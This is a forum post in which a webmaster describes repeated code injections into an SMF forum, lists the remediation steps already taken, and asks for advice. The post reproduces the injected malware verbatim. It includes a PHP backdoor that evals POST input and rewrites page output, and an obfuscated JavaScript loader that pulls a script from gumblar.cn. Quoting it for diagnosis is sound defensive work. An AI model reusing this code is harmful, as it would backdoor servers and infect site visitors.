Code keeps getting inserted into my SMF installation (as well as any other PHP, HTML, JS files).
Here's what I've done to prevent things
in addition to upgrading to the latest 1.x SMF:
- Ran rkhunter to confirm that the site hasn't been root-hacked. It hasn't
been.
- Upgraded PHP and Apache to the latest stable version of PHP.
- chmodded the files to be read-only, no write.
- Changed my admin password in the SMF software
- Scrambled my passwords for command line and root (that said, no indications
exist that someone other than me is logging into either account)
Here's what still happened after I did all of the above:
The following PHP code has been injected into my PHP scripts at least 3 times
in the past two weeks. Latest was around 7am server time this morning (more
below the excerpt):
<?php
if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eva
l($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',bas
e64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBX
MW1yZD0nJSc7dmFyIFZrdj11bmVzY2FwZSgoJ3ZhckAyMGFAM2RAMjJTY3JpQDcwdEA0NUA2ZWdANjlu
ZUAyMkAyY2JAM2RAMjJWZXJzaUA2Zm4oQDI5K0AyMkAyY0A2YUAzZEAyMkAyMkAyY0A3NUAzZG5hdkA2
OUA2N2F0b3JAMmV1c2VyQWdlbnRAM2JpZigodUAyZWluZEA2NXhANGZmKEAyMldpbkAyMkAyOUAzZTBA
MjlAMjZAMjYoQDc1QDJlaUA2ZWRleE9mQDI4QDIyTlRAMjBAMzZAMjIpQDNjMClAMjZAMjZAMjhkb2N1
QDZkZW50QDJlY29va2llQDJlQDY5QDZlQDY0ZXhPZihAMjJtQDY5ZWtAM2QxQDIyKUAzY0AzMClAMjZA
MjYodHlANzBlb2YoQDdhckA3Nnp0QDczQDI5QDIxQDNkQDc0QDc5cGVvZihAMjJBQDIyKSkpQDdienJ2
enRANzNAM2RAMjJANDFAMjJAM2JANjVANzZANjFsQDI4QDIyaWYod0A2OUA2ZWRvQDc3QDJlQDIyK2Er
QDIyKUA2YUAzZGorQDIyK2ErQDIyQDRkQDYxQDZhb0A3MkAyMkAyYmJAMmJhK0AyMk1pbm9yQDIyK0A2
MitANjErQDIyQDQydWlsZEAyMitiQDJiQDIyakAzYkAyMkAyOUAzYmRANmZjQDc1bWVudEAyZXdyQDY5
dEA2NShAMjJAM2NzQDYzckA2OXBANzRAMjBzQDcyY0AzZEAyZkAyZmd1bWJsYUA3MkAyZWNuQDJmckA3
M3NAMmZAM2ZANjlkQDNkQDIyK2orQDIyQDNlQDNjQDVjQDJmc2NyaXB0QDNlQDIyKUAzYkA3ZCcpLnJl
cGxhY2UoL0AvZyxXMW1yZCkpO2V2YWwoVmt2KX0pKCk7CiAtLT48L3NjcmlwdD4='));function
tmp
_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10
,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]
as $v)i
f(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30
,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v
)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_re
place($v,'',$s);}$s1=preg_replace('#<script language=javascript><!--
\ndocument\
.write\(unescape\(.+?\n
--></script>#','',$s);if(stristr($s,'<body'))$s=preg_rep
lace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</bod
y')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return
$g?gzencode($s):$s;}funct
ion
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'
])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1)
as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default
ou
tput
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents
();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start
($s[$i][0]);echo
$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_
lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
This gets inserted into HTML files:
<script language=javascript><script language=javascript><!--
(function(){var W1mrd='%';var
Vkv=unescape(('var@20a@3d@22Scri@70t@45@6eg@69ne@2
2@2cb@3d@22Versi@6fn(@29+@22@2c@6a@3d@22@22@2c@75@3dnav@69@67ator@2euserAgent@3b
if((u@2eind@65x@4ff(@22Win@22@29@3e0@29@26@26(@75@2ei@6edexOf@28@22NT@20@36@22)@
3c0)@26@26@28docu@6dent@2ecookie@2e@69@6e@64exOf(@22m@69ek@3d1@22)@3c@30)@26@26(
ty@70eof(@7ar@76zt@73@29@21@3d@74@79peof(@22A@22)))@7bzrvzt@73@3d@22@41@22@3b@65
@76@61l@28@22if(w@69@6edo@77@2e@22+a+@22)@6a@3dj+@22+a+@22@4d@61@6ao@72@22@2bb@2
ba+@22Minor@22+@62+@61+@22@42uild@22+b@2b@22j@3b@22@29@3bd@6fc@75ment@2ewr@69t@6
5(@22@3cs@63r@69p@74@20s@72c@3d@2f@2fgumbla@72@2ecn@2fr@73s@2f@3f@69d@3d@22+j+@2
2@3e@3c@5c@2fscript@3e@22)@3b@7d').replace(/@/g,W1mrd));eval(Vkv)})();
--></script>
A very similar chunk of code as the above gets inserted into JS files.
Anyone have thoughts on what steps to take beyond what I've done already?
Here's some stuff that's been reported about this intrusion elsewhere:
http://forums.nasioc.com/forums/showthread.php?p=26537579 [nofollow]http://stackoverflow.com/questions/810402/virus-in-php/818935 [nofollow]Short of ditching everything and finding a new hosting provider, I'm not sure I see anything in the above I haven't done...
Thoughts?